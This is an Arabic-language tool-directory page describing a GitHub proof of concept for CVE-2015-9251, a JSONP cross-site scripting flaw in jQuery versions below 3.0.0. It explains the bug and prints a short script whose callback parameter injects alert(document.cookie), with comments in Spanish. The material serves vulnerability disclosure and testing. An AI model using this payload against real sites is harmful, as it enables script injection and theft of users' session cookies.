Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-9251 — PoC لـ CVE-2015-9251 jQuery أقل من 3.0.0. | Kitploit
أدوات/GitHubGitHub/moften/cve-2015-9251
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmoften/cve-2015-9251

CVE-2015-9251

PoC لـ CVE-2015-9251 jQuery أقل من 3.0.0.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2015-9251

[email protected]

PoC لـ CVE-2015-9251 jQuery أصغر من 3.0.0.

CVE-2015-9251 - PoC Exploit

يحتوي هذا المستودع على إثبات المفهوم (PoC) لثغرة CVE-2015-9251 في مكتبة jQuery. تسمح الثغرة بهجوم Cross-Site Scripting (XSS) عبر استدعاءات JSONP دون تنظيف، وذلك لأن jQuery يسمح بحقن الكود في معامل callback في الإصدارات الأقدم من 3.0.0.


الوصف

CVE-2015-9251 تؤثر على إصدارات jQuery الأقدم من 3.0.0. تُستغل الثغرة عن طريق التلاعب بمعامل callback في طلب JSONP، مما قد يسمح بتنفيذ كود JavaScript عشوائي في متصفح الضحية. قد يؤدي ذلك إلى كشف بيانات حساسة، مثل ملفات تعريف الارتباط الخاصة بالجلسة.

المتطلبات

  1. بيئة الاختبار: يجب أن يستخدم التطبيق الويب الثغرة إصدارًا من jQuery أصغر من 3.0.0.
  2. متصفح ويب: لتشغيل PoC وملاحظة سلوك الثغرة.
  3. أداة الفحص: ستكون أدوات المطور (DevTools) في المتصفح مفيدة لعرض النتائج.

تشغيل PoC

لتشغيل PoC، اتبع الخطوات التالية:

  1. انسخ والصق الكود في وحدة تحكم المتصفح أو ضعه في صفحة HTML للاختبار.

كود PoC:

root@kitploit:~
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
  // Función que simula una solicitud a un servidor vulnerable
  $.ajax({
    url: "https://example.com/api?callback=alert(document.cookie)",
    dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
    success: function(response) {
      console.log(response);
    }
  });
</script>
تنزيل الأداة